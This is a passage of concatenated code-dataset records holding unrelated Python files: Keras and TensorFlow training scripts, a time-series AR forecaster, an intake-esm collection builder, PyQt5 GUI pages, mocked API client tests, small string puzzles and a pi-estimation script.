tf\nimport cv2\nimport keras\nfrom keras.layers import Flatten\n\n\nimg = cv2.imread('baj.jpg',cv2.IMREAD_GRAYSCALE)\nimg2 = cv2.resize(img, (28,28))\nimg3 = 1- (img2.reshape((1,28*28))/255)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\nfashion_mnist = keras.datasets.fashion_mnist\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(10, activation='softmax')\n])\n\nmodel.compile(optimizer=\"adam\",\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(train_images, train_labels, epochs=10)\nmodel.save(\"mymodel\")\n\nprint(\"-------------------------------------------------\")\nprint(img3)\nprint(\"-------------------------------------------------\")\nprint(model.predict(img3))\nprint(\"-------------------------------------------------\")\n\ntest_loss, test_acc = model.evaluate(test_images,test_labels,verbose=2)\nprint('\\nTest accuracy',test_acc)\n","sub_path":"day17/myfashion02getweb.py","file_name":"myfashion02getweb.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"453703054","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom statsmodels.tsa.ar_model import AR \nimport tensorflow as tf\n\n\nclass 
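# The LaTeX-export step in the regression script above writes `beginningtex`
# and `endtex` without ever defining them, so it raises NameError before the
# table is saved. A hedged sketch of the missing wrapper strings; the document
# class is an assumption, any preamble that compiles around the
# summary().as_latex() tabular will do.
beginningtex = "\\documentclass{report}\n\\begin{document}\n"
endtex = "\\end{document}\n"

# with open("myreg.tex", "w") as f:
#     f.write(beginningtex)
#     f.write(result.summary().as_latex())
#     f.write(endtex)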
myAR(object):\n def __init__(self):\n self.model = None\n self.scaler_load = None\n self.scaler_diff = None\n self.df = None\n self.batch_size = 32\n\n self.in_forecast = False\n self.in_training = False\n self.in_change = False\n\n def train(self, tsData, nb_epochs = 40, batchSize = 32):\n \"\"\"\n Trains the LSTM on the initial TimeSeries data. \n \n tsData can be pandas object with DateTimeIndex or a numpy array\n \"\"\"\n self.in_training = True\n if self.batch_size != batchSize:\n self.batch_size = batchSize\n \n # if self.model is not None:\n # print('Model is already trained')\n # return\n \n # TODO input validation\n temp_df = pd.DataFrame(tsData).copy()\n temp_df.columns = ['load']\n \n # Scale the input train data\n temp_scaler_load = StandardScaler()\n temp_df['scaledLoad'] = temp_scaler_load.fit_transform(temp_df[['load']])\n \n # Reshape the input to the desired form\n # df_train = self.df[['scaledLoad', 'scaledDiff', 'outVal']].dropna().values\n \n # Create AR Network\n temp_model = AR(temp_df.scaledLoad).fit()\n while self.in_forecast:\n print('Training is waiting for forecast finish to change the model')\n self.in_change = True\n self.model = temp_model\n self.scaler_load = temp_scaler_load\n self.df = temp_df\n self.in_change = False\n\n def addTsValue(self, newTsVal):\n \"\"\"\n Append new values to the existing load history\n \"\"\"\n newDf = newTsVal\n if not hasattr(type(newDf), '__iter__'): \n newDf = np.array([newDf])\n else:\n newDf = np.array(newDf)\n\n newDf = pd.DataFrame({'load': newDf})\n \n # newDf['diff'] = newDf.load.diff()\n # newDf['outVal'] = newDf.load.shift(-1)\n \n # newDf['scaledDiff'] = self.scaler_diff.transform(newDf[['diff']])\n newDf['scaledLoad'] = self.scaler_load.transform(newDf[['load']])\n # newDf['outVal'] = self.scaler_load.transform(newDf[['outVal']])\n \n # newDf = newDf.iloc[1:]\n \n self.df = pd.concat([self.df, newDf], sort=False).reset_index(drop=True)\n return newDf\n \n def makeTestPrediction(self, inputData):\n \"\"\"\n Evaluates all input test data, and returns them\n \"\"\"\n \n # add input data to dataframe:\n df_test = self.addTsValue(inputData)\n \n window = self.model.k_ar\n coef = self.model.params\n \n history = list(df_test.scaledLoad.values[-window:])\n predictions = list()\n \n for t in range(df_test.shape[0]):\n length = len(history)\n lag = [history[i] for i in range(length - window, length)]\n yhat = coef[0]\n for d in range(window):\n yhat += coef[d+1] * lag[ window - d - 1 ]\n obs = df_test.scaledLoad.values[t]\n \n predictions.append(float(yhat))\n history.append(float(obs))\n \n return df_test\n\n # make a one-step forecast\n def forecast(self):\n \"\"\"\n Makes a prediction based on the last element of the inner history of the model.\n \"\"\"\n while self.in_change:\n print('Forecast is waiting for model change')\n self.in_training = True\n window = self.model.k_ar\n coef = self.model.params\n \n history = list(self.df.scaledLoad.values[-window:]) \n length = len(history)\n \n lag = [history[i] for i in range(length - window, length)]\n yhat = coef[0]\n for d in range(window):\n yhat += coef[d+1] * lag[window-d-1]\n\n self.in_training = False\n return self.scaler_load.inverse_transform(np.array([float(yhat)]))[0]\n","sub_path":"mlhpa/armlhpacomponent/ARmodel.py","file_name":"ARmodel.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608667529","text":"def solver(n):\n a = list(map(int, input().split()))\n if all(x 
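# A hedged usage sketch for the myAR wrapper above: train on a short synthetic
# series, append one new observation, then forecast a single step ahead. It
# assumes a statsmodels version that still ships tsa.ar_model.AR (the class the
# file imports) and enough history to cover the fitted lag order; the sine
# series is illustrative.
import numpy as np

if __name__ == "__main__":
    series = np.sin(np.linspace(0, 20, 200)) + np.random.normal(0, 0.1, 200)
    model = myAR()
    model.train(series)
    model.addTsValue(series[-1] + 0.05)
    print("one-step forecast:", model.forecast())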
> 0 for x in a) and any(str(x) == str(x)[::-1] for x in a):\n print('True')\n else:\n print('False')\n\n\nif __name__ == \"__main__\":\n n = int(input())\n solver(n)\n","sub_path":"any.py","file_name":"any.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343402958","text":"from abc import ABC, abstractclassmethod\nfrom pathlib import Path\n\nimport docrep\nimport pandas as pd\nimport xarray as xr\nfrom tqdm.auto import tqdm\n\nfrom . import config\nfrom .bld_collection_utils import make_attrs\nfrom .storage import StorageResource\n\ndocstrings = docrep.DocstringProcessor()\n\n\n@docstrings.get_sectionsf('Collection')\nclass Collection(ABC):\n \"\"\" Base class to build collections.\n\n This class should not be used directly, use inherited class approriate for\n individual collection (e.g. CMIP5Collection, CESMCollection)\n\n Parameters\n ----------\n\n collection_spec : dict\n\n\n See Also\n --------\n\n CMIP5Collection\n CMIP6Collection\n CESMCollection\n MPIGECollection\n GMETCollection\n\n \"\"\"\n\n def __init__(self, collection_spec, fs=None):\n self.fs = fs\n self.collection_spec = collection_spec\n self.collection_definition = config.get('collections').get(\n collection_spec['collection_type'], None\n )\n self.columns = self.collection_definition.get(\n config.normalize_key('collection_columns'), None\n )\n if not self.columns:\n raise ValueError(\n f\"Unable to locate collection columns for {collection_spec['collection_type']} collection type in {config.PATH}\"\n )\n self.df = pd.DataFrame(columns=self.columns)\n self._ds = xr.Dataset()\n self.exclude_patterns = self._get_exclude_patterns()\n self.database_dir = Path(config.get('database-directory')).absolute()\n self.order_by_columns = self.collection_definition.get('order-by-columns')\n\n self._validate()\n\n if self.database_dir:\n self.collection_db_file = Path(\n f\"{self.database_dir}/{collection_spec['name']}.nc\"\n ).absolute()\n self.database_dir.mkdir(parents=True, exist_ok=True)\n\n def build(self):\n \"\"\" Main method for looping through data sources and building\n a collection catalog.\n \"\"\"\n dfs = {}\n data_sources = self.collection_spec['data_sources'].items()\n for data_source, data_source_attrs in data_sources:\n df_i = self.assemble_file_list(data_source, data_source_attrs, self.exclude_patterns)\n dfs.update(df_i)\n\n self._ds = self._finalize_build(dfs).reset_index(drop=True).to_xarray()\n\n attrs = make_attrs(\n attrs={\n 'collection_spec': self.collection_spec,\n 'name': self.collection_spec['name'],\n 'collection_type': self.collection_spec['collection_type'],\n }\n )\n self._ds.attrs = attrs\n self._persist_db_file()\n\n def assemble_file_list(self, data_source, data_source_attrs, exclude_patterns=[]):\n \"\"\" Assemble file listing for data sources into Pandas dataframes.\n \"\"\"\n df_files = {}\n for location in data_source_attrs['locations']:\n res_key = ':'.join(\n [data_source, location['name'], location['loc_type'], location['urlpath']]\n )\n if res_key not in df_files:\n print(f'Getting file listing: {res_key}')\n\n resource = StorageResource(\n urlpath=location['urlpath'],\n loc_type=location['loc_type'],\n exclude_patterns=exclude_patterns,\n file_extension=location.get('file_extension', '.nc'),\n fs=self.fs,\n )\n\n df_files[res_key] = self._assemble_collection_df_files(\n resource_key=res_key,\n resource_type=location['loc_type'],\n direct_access=location['direct_access'],\n 
filelist=resource.filelist,\n urlpath=location['urlpath'],\n )\n df_files[res_key] = self._add_extra_attributes(\n data_source,\n df_files[res_key],\n extra_attrs=data_source_attrs.get('extra_attributes', {}),\n )\n\n return df_files\n\n def _add_extra_attributes(self, data_source, df, extra_attrs):\n \"\"\" Add extra attributes to individual data sources.\n\n Subclasses can override this method with a custom implementation.\n\n \"\"\"\n\n if extra_attrs:\n for key, value in extra_attrs.items():\n df[key] = value\n return df\n\n def _assemble_collection_df_files(\n self, resource_key, resource_type, direct_access, filelist, urlpath=None\n ):\n entries = {key: [] for key in self.columns}\n if not filelist:\n return pd.DataFrame(entries)\n\n # Check parameters of _get_file_attrs for presence of urlpath for backwards compatibility\n from inspect import signature\n\n sig = signature(self._get_file_attrs)\n if 'urlpath' in sig.parameters:\n pass_urlpath = True\n else:\n pass_urlpath = False\n\n for f in tqdm(filelist, desc='file listing', disable=not config.get('progress-bar')):\n if pass_urlpath:\n file_attrs = self._get_file_attrs(f, urlpath)\n else:\n file_attrs = self._get_file_attrs(f)\n\n if not file_attrs:\n continue\n\n file_attrs['resource'] = resource_key\n file_attrs['resource_type'] = resource_type\n file_attrs['direct_access'] = direct_access\n\n for col in self.columns:\n entries[col].append(file_attrs.get(col, None))\n\n return pd.DataFrame(entries)\n\n @abstractclassmethod\n def _get_file_attrs(self, filepath):\n \"\"\"Extract attributes from file path\n\n \"\"\"\n pass\n\n def _finalize_build(self, df_files):\n \"\"\" This method is used to finalize the build process by:\n\n - Removing duplicates\n - Adding extra metadata\n\n Parameters\n ----------\n df_files : dict\n Dictionary containing Pandas dataframes for different data sources\n\n\n Returns\n --------\n df : pandas.DataFrame\n Cleaned dataframe containing all entries\n\n Notes\n -----\n\n Subclasses can implement custom version.\n \"\"\"\n\n df = pd.concat(list(df_files.values()), ignore_index=True, sort=False)\n # Reorder columns\n df = df[self.columns]\n\n # Remove duplicates\n df = df.drop_duplicates(subset=['resource', 'file_fullpath'], keep='last').reset_index(\n drop=True\n )\n df = df.sort_values(self.order_by_columns)\n\n return df\n\n def _get_exclude_patterns(self):\n \"\"\"Get patterns of files and directories to exclude from\n the collection\n \"\"\"\n collection_spec = self.collection_spec\n exclude_patterns = []\n data_sources = collection_spec['data_sources']\n for data_source, data_source_attrs in data_sources.items():\n locations = data_source_attrs['locations']\n for loc in locations:\n exclude = loc.get('exclude_patterns', None) or loc.get('exclude_dirs', None)\n if exclude:\n exclude_patterns.extend(exclude)\n\n return exclude_patterns\n\n def _validate(self):\n \"\"\"Checks that collection columns are properly defined in `config.yaml` file.\n \"\"\"\n for req_col in config.get('collections')[self.collection_spec['collection_type']][\n 'required-columns'\n ]:\n if req_col not in self.columns:\n raise ValueError(\n f\"Missing required column: {req_col} for {self.collection_spec['collection_type']} in {config.PATH}\"\n )\n\n def _persist_db_file(self):\n \"\"\" Persist built collection database to disk.\n \"\"\"\n if len(self._ds.index) > 0:\n print(f\"Persisting {self.collection_spec['name']} at : {self.collection_db_file}\")\n\n if self.collection_db_file.exists():\n 
self.collection_db_file.unlink()\n\n # specify encoding to avoid: ValueError: unsupported dtype for netCDF4 variable: bool\n self._ds.to_netcdf(\n self.collection_db_file,\n mode='w',\n engine='netcdf4',\n encoding={'direct_access': {'dtype': 'bool'}},\n )\n\n else:\n print(f\"{self._ds} is an empty dataset. It won't be persisted to disk.\")\n","sub_path":"intake_esm/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583893807","text":"# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Generic evaluation script that evaluates a model using a given dataset.\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport util\nimport numpy as np\nimport tensorflow as tf\nfrom nets import nets_factory\n\nslim = tf.contrib.slim\n\ntf.app.flags.DEFINE_integer(\n 'batch_size', 50, 'The number of samples in each batch.')\n\ntf.app.flags.DEFINE_integer(\n 'max_num_batches', None,\n 'Max number of batches to evaluate by default use all.')\n\ntf.app.flags.DEFINE_string(\n 'master', '', 'The address of the TensorFlow master to use.')\n\ntf.app.flags.DEFINE_string(\n 'checkpoint_path', '/tmp/tfmodel/',\n 'The directory where the model was written to or an absolute path to a '\n 'checkpoint file.')\n\ntf.app.flags.DEFINE_string(\n 'eval_dir', '/tmp/tfmodel/', 'Directory where the results are saved to.')\n\ntf.app.flags.DEFINE_integer(\n 'num_preprocessing_threads', 4,\n 'The number of threads used to create the batches.')\n\ntf.app.flags.DEFINE_string(\n 'dataset_name', 'imagenet', 'The name of the dataset to load.')\n\ntf.app.flags.DEFINE_string(\n 'dataset_split_name', 'test', 'The name of the train/test split.')\n\ntf.app.flags.DEFINE_string(\n 'dataset_dir', None, 'The directory where the dataset files are stored.')\n\ntf.app.flags.DEFINE_integer(\n 'labels_offset', 0,\n 'An offset for the labels in the dataset. This flag is primarily used to '\n 'evaluate the VGG and ResNet architectures which do not use a background '\n 'class for the ImageNet dataset.')\n\ntf.app.flags.DEFINE_string(\n 'model_name', 'inception_v3', 'The name of the architecture to evaluate.')\n\ntf.app.flags.DEFINE_string(\n 'preprocessing_name', None, 'The name of the preprocessing to use. 
If left '\n 'as `None`, then the model_name flag is used.')\n\ntf.app.flags.DEFINE_float(\n 'moving_average_decay', None,\n 'The decay to use for the moving average.'\n 'If left as None, then moving averages are not used.')\n\ntf.app.flags.DEFINE_integer(\n 'eval_image_size', None, 'Eval image size')\n\nFLAGS = tf.app.flags.FLAGS\n\nimage_path = \"/home/grenki/src/models/research/slim/d.png\"\nNUM_CLASSES = 1001\n\n\ndef main(_):\n if not FLAGS.dataset_dir:\n raise ValueError('You must supply the dataset directory with --dataset_dir')\n\n root_result_folder = os.path.join(FLAGS.dataset_dir, \"features_vectors\")\n\n for dir in os.listdir(FLAGS.dataset_dir):\n dir_path = os.path.join(FLAGS.dataset_dir, dir)\n if not os.path.isdir(dir_path):\n continue\n\n tf.logging.set_verbosity(tf.logging.INFO)\n with tf.Graph().as_default():\n tf_global_step = slim.get_or_create_global_step() # ####################\n # # Select the model #\n # ####################\n network_fn = nets_factory.get_network_fn(\n FLAGS.model_name,\n num_classes=NUM_CLASSES,\n is_training=False)\n\n image_names, img = util.load_images(dir_path, FLAGS, FLAGS.eval_image_size or network_fn.default_image_size)\n if not image_names:\n continue\n\n logits, endpoints = network_fn(img)\n\n if FLAGS.moving_average_decay:\n variable_averages = tf.train.ExponentialMovingAverage(\n FLAGS.moving_average_decay, tf_global_step)\n variables_to_restore = variable_averages.variables_to_restore(\n slim.get_model_variables())\n variables_to_restore[tf_global_step.op.name] = tf_global_step\n else:\n variables_to_restore = slim.get_variables_to_restore()\n\n predictions = tf.argmax(logits, 1)\n\n # print(FLAGS.batch_size)\n num_batches = FLAGS.max_num_batches or 1\n\n if tf.gfile.IsDirectory(FLAGS.checkpoint_path):\n checkpoint_path = tf.train.latest_checkpoint(FLAGS.checkpoint_path)\n else:\n checkpoint_path = FLAGS.checkpoint_path\n\n tf.logging.info('Evaluating %s' % checkpoint_path)\n\n before_fc_tensor = endpoints[\"PreLogitsFlatten\"]\n before_fc = slim.evaluation.evaluate_once(master=FLAGS.master, checkpoint_path=checkpoint_path,\n logdir=FLAGS.eval_dir,\n num_evals=num_batches,\n final_op=before_fc_tensor,\n variables_to_restore=variables_to_restore)\n\n result_folder = os.path.join(root_result_folder, dir)\n if not os.path.exists(result_folder):\n os.makedirs(result_folder)\n for img_name, arr in zip(image_names, before_fc):\n np.save(os.path.join(result_folder, img_name), np.asarray(arr))\n\n # print(before_fc)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"research/slim/eval_image_classifier.py","file_name":"eval_image_classifier.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"323923841","text":"import json\nimport requests_mock\nfrom nose.tools import eq_, raises\n\nfrom responses import GET_TASKS_RESPONSE\nfrom sdelements.SDEClient import SDEClient\n\n\n@requests_mock.Mocker()\nclass TestGetTasks(object):\n\n def test_get_tasks_basic_auth(self, m):\n sde_client = SDEClient(\"http://localhost/sde\", \"Basic\", None, \"admin\", \"admin\", None)\n m.register_uri('GET', SDEClient.GET_TASKS_URI % (sde_client.url, '1'), json=json.loads(GET_TASKS_RESPONSE))\n eq_(json.loads(GET_TASKS_RESPONSE), sde_client.get_tasks('1'))\n\n def test_get_tasks_token_auth(self, m):\n sde_client = SDEClient(\"http://localhost/sde\", \"PAT\", None, None, None, \"1234abcd\")\n m.register_uri('GET', SDEClient.GET_TASKS_URI % (sde_client.url, '1'), 
json=json.loads(GET_TASKS_RESPONSE))\n eq_(json.loads(GET_TASKS_RESPONSE), sde_client.get_tasks('1'))\n\n @raises(Exception)\n def test_get_unknown_authentication_method(self, m):\n sde_client = SDEClient(\"http://localhost/sde\", \"Unknown\", None, None, None, None)\n m.register_uri('GET', SDEClient.GET_TASKS_URI % (sde_client.url, '1'), json=json.loads(GET_TASKS_RESPONSE))\n sde_client.get_tasks('1')\n","sub_path":"src/test/jython/test_get_tasks.py","file_name":"test_get_tasks.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443367934","text":"import matplotlib.colors as mclr\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import models\nfrom tensorflow.keras.callbacks import History\n\n\n# Функцию выбрать в зависимости от варианта\ndef gen_data(size=500):\n size1 = size // 2\n size2 = size - size1\n x1 = np.random.rand(size1, 1) * 1.3 - 0.95\n y1 = np.asarray([3.5 * (i + 0.2) ** 2 - 0.8 + (np.random.rand(1) - 0.5) / 3 for i in x1])\n data1 = np.hstack((x1, y1))\n label1 = np.zeros([size1, 1])\n div1 = round(size1 * 0.8)\n x2 = np.random.rand(size2, 1) * 1.3 - 0.35\n y2 = np.asarray([-3.5 * (i - 0.2) ** 2 + 0.8 + (np.random.rand(1) - 0.5) / 3 for i in x2])\n data2 = np.hstack((x2, y2))\n label2 = np.ones([size2, 1])\n div2 = round(size2 * 0.8)\n div = div1 + div2\n order = np.random.permutation(div)\n train_data = np.vstack((data1[:div1], data2[:div2]))\n test_data = np.vstack((data1[div1:], data2[div2:]))\n train_label = np.vstack((label1[:div1], label2[:div2]))\n test_label = np.vstack((label1[div1:], label2[div2:]))\n return (train_data[order, :], train_label[order, :]), (test_data, test_label)\n\n\ndef draw_results(data, label, prediction):\n p_label = np.array([round(x[0]) for x in prediction])\n plt.scatter(data[:, 0], data[:, 1], s=30, c=label[:, 0], cmap=mclr.ListedColormap(['red', 'blue']))\n plt.scatter(data[:, 0], data[:, 1], s=10, c=p_label, cmap=mclr.ListedColormap(['red', 'blue']))\n plt.grid()\n plt.show()\n\n\ndef create_model() -> models.Model:\n model = models.Sequential()\n\n model.add(layers.Dense(10001, activation='relu'))\n model.add(layers.Dense(1, activation='sigmoid'))\n\n model.compile(optimizer=\"rmsprop\", loss=\"binary_crossentropy\",\n metrics=[\"accuracy\"])\n return model\n\n\ndef train_model(model: models.Model, train_data: np.array, train_labels: np.array, test_data: np.array,\n test_labels: np.array, epochs: int) -> History:\n return model.fit(train_data, train_labels, epochs=epochs, validation_data=(test_data, test_labels))\n\n\ndef main():\n (train_data, train_label), (test_data, test_label) = gen_data()\n\n # В данном месте необходимо создать модель и обучить ее\n model = create_model()\n history = train_model(model, train_data, train_label, test_data, test_label, 20)\n\n # Получение ошибки и точности в процессе обучения\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n acc = history.history['accuracy']\n val_acc = history.history['val_accuracy']\n epochs = range(1, len(loss) + 1)\n\n # Построение графика ошибки\n plt.plot(epochs, loss, 'bo', label='Training loss')\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n plt.show()\n\n # Построение графика точности\n plt.clf()\n plt.plot(epochs, acc, 'bo', label='Training acc')\n plt.plot(epochs, val_acc, 
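# A hedged stand-alone sketch of the requests_mock pattern used in the
# SDEClient tests above: register a fake endpoint, issue a real requests call,
# and assert on the parsed response. The URL and payload are illustrative; the
# register_uri call mirrors the one in the tests.
import requests
import requests_mock


def test_mocked_get():
    with requests_mock.Mocker() as m:
        m.register_uri("GET", "http://localhost/api/tasks", json={"tasks": []})
        resp = requests.get("http://localhost/api/tasks")
        assert resp.json() == {"tasks": []}


test_mocked_get()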
'b', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n plt.show()\n\n # Получение и вывод результатов на тестовом наборе\n results = model.evaluate(test_data, test_label)\n print(results)\n\n # Вывод результатов бинарной классификации\n all_data = np.vstack((train_data, test_data))\n all_label = np.vstack((train_label, test_label))\n pred = model.predict(all_data)\n draw_results(all_data, all_label, pred)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"8382/shchemel/pr/2/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"91431459","text":"from PyQt5.QtCore import QDir, pyqtSignal\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QTextBrowser, QPushButton, QSpacerItem, QSizePolicy, QFileDialog, \\\n QScrollArea, QAbstractScrollArea, QWidget, QLabel, QComboBox, QCheckBox\n\nfrom config import content1, content2, content3\nfrom libPage import Page\n\n\nclass FirstPage(Page):\n changeFilename = pyqtSignal(str)\n\n def __init__(self, parent=None):\n Page.__init__(self, parent=parent)\n self.setLayout(QVBoxLayout())\n\n tb = QTextBrowser(self)\n tb.setHtml(content1)\n\n self.layout().addWidget(tb)\n\n hbox = QHBoxLayout()\n\n btn = QPushButton(self)\n btn.setText(\"File picker to load the CSV file from user's disk.\")\n\n btn.clicked.connect(self.loadFilename)\n hbox.addWidget(btn)\n\n item = QSpacerItem(1, 1, QSizePolicy.Expanding, QSizePolicy.Fixed)\n hbox.addItem(item)\n\n self.layout().addLayout(hbox)\n\n def loadFilename(self):\n fileName, _ = QFileDialog.getOpenFileName(self,\n \"Open CSV File\",\n QDir.currentPath(),\n \"CSV Files (*.csv)\")\n\n if fileName != \"\":\n self.changeFilename.emit(fileName)\n self.finished.emit()\n\n\nclass SecongPage(Page):\n\n def __init__(self, parent=None):\n QWidget.__init__(self, parent=parent)\n self.setLayout(QHBoxLayout())\n\n vbox = QVBoxLayout()\n\n self.layout().addLayout(vbox)\n\n scrollArea = QScrollArea(self)\n\n scrollArea.setSizeAdjustPolicy(QAbstractScrollArea.AdjustToContents)\n scrollArea.setWidgetResizable(True)\n\n contentWidget = QWidget()\n contentWidget.setStyleSheet(\".QWidget{background-color: rgb(255, 255, 255);}\")\n scrollArea.setWidget(contentWidget)\n contentWidget.setLayout(QVBoxLayout())\n\n vbox.addWidget(QLabel(\"One Column Name:\", contentWidget))\n self.oneComboBox = QComboBox(contentWidget)\n vbox.addWidget(self.oneComboBox)\n vbox.addWidget(QLabel(\"Column names:\", contentWidget))\n\n self.LabelLayout = QVBoxLayout()\n contentWidget.layout().addLayout(self.LabelLayout)\n\n spacerItem = QSpacerItem(1, 1, QSizePolicy.Minimum, QSizePolicy.Expanding)\n contentWidget.layout().addItem(spacerItem)\n\n processBtn = QPushButton(\"Process\")\n processBtn.clicked.connect(self.finished.emit)\n\n vbox.addWidget(scrollArea)\n vbox.addWidget(processBtn)\n\n textBrowser = QTextBrowser(self)\n textBrowser.setHtml(content2)\n\n self.layout().addWidget(textBrowser)\n\n self.layout().setStretch(0, 1)\n self.layout().setStretch(1, 1)\n self.labels = []\n self.oneComboBox.currentIndexChanged.connect(self.configElements)\n\n def setFields(self, fields):\n self.oneComboBox.blockSignals(True)\n self.oneComboBox.clear()\n self.oneComboBox.addItems(fields)\n self.oneComboBox.blockSignals(False)\n\n for w in self.labels:\n w.deleteLater()\n self.labels = []\n\n for text in fields:\n ch = QLabel(text)\n 
self.LabelLayout.addWidget(ch)\n self.labels.append(ch)\n\n self.configElements()\n\n def configElements(self):\n current_text = self.oneComboBox.currentText()\n\n for label in self.labels:\n if label.text() == current_text:\n label.hide()\n else:\n label.show()\n\n\nclass ThirdPage(Page):\n def __init__(self, parent=None):\n Page.__init__(self, parent=parent)\n self.setLayout(QVBoxLayout())\n self.textBrowser = QTextBrowser()\n self.layout().addWidget(self.textBrowser)\n\n def setText(self, intercept, coefficient, interpretation, y_var, co_dict):\n html = content3.format(Intercept=intercept,\n Coefficient=coefficient,\n interpretation=interpretation,\n y_var=y_var,\n co_dict=co_dict)\n self.textBrowser.setHtml(html)\n","sub_path":"PandasSeabornOnPyQt5/GUI/CustomPages.py","file_name":"CustomPages.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"122562165","text":"\"\"\"\nCopyright 2021 Diego Parrilla\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport logging\n\nfrom headless_chrome import create_driver\n\nlogging.basicConfig()\nlogging.getLogger().setLevel(logging.INFO)\n\n\ndef lambda_handler(_event, _context):\n \"\"\" Sample handle about how to use the imported the layer \"\"\"\n\n driver = create_driver()\n driver.get(\"https://www.google.com\")\n return driver.page_source\n","sub_path":"src/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"274149386","text":"# Written by : Hamin Lee \n\nclass Solution(object):\n def equalsWhenOneCharRemoved(self, x, y):\n '''\n Implement a function/method that is given two strings and returns \n whether one can be obtained by the other after removing exactly one character. 
\n        Specifically, given two strings x and y, return true if and only \n        if (1) x can be obtained by removing one character from y and/or \n        (2) if y can be obtained by removing one character from x.\n\n        :param x: A non-empty string containing English letters only\n        :type x: String\n\n        :param y: A non-empty string containing English letters only\n        :type y: String\n\n        :rtype: Boolean\n        '''\n        # If len(x) and len(y) differs not exactly by 1, return False\n        if (abs(len(x) - len(y)) != 1):\n            return False\n        \n        # Loop through shorter string\n        shorterLen = min(len(x), len(y))\n        counter = 0\n        \n        # Time complexity is O(min(len(x), len(y))) == O(shorterLen)\n        # range is lazy in Python 3, so this loop uses constant memory\n        for i in range(shorterLen):\n            if x[i] != y[i]:\n                # If different increment counter by 1\n                counter += 1\n                # If x is the longer string compare x[i+1:] to y[i:] vice versa\n                # This will check if we remove current index, the strings will match or not\n                if len(x) > len(y):\n                    if x[i+1:] == y[i:]:\n                        return True\n                    else:\n                        return False\n                if len(x) < len(y):\n                    if x[i:] == y[i+1:]:\n                        return True\n                    else:\n                        return False\n        # If all elements are equal, then we simply have to remove the last element\n        # Thus, return True\n        if counter == 0:\n            return True\n\n\nif __name__ == \"__main__\":\n    solution = Solution()\n    print(solution.equalsWhenOneCharRemoved(\"abb\",\"aacb\")) # Returns False\n    print(solution.equalsWhenOneCharRemoved(\"bcb\",\"bb\")) # Returns True\n    print(solution.equalsWhenOneCharRemoved(\"\",\"bb\")) # Returns False\n    print(solution.equalsWhenOneCharRemoved(\"bcb\",\"bb\")) # Returns True\n    print(solution.equalsWhenOneCharRemoved(\"bb\",\"cbb\")) # Returns True\n    print(solution.equalsWhenOneCharRemoved(\"moloco\",\"mocco\")) # Returns False\n","sub_path":"medium/removeOneChar.py","file_name":"removeOneChar.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"302041928","text":"\"\"\"\nHere, I calculate pi using a couple different techniques, as well as e.\n\"\"\"\n\nfrom timeit import timeit\n\nfrom math import sqrt\n\ndef factorial(n):\n    if n == 1 or n == 0:\n        return(1)\n    else:\n        return(n*factorial(n-1))\n\ndef pi_sum1(max=10000):\n    sum = 0\n    for k in range(max):\n        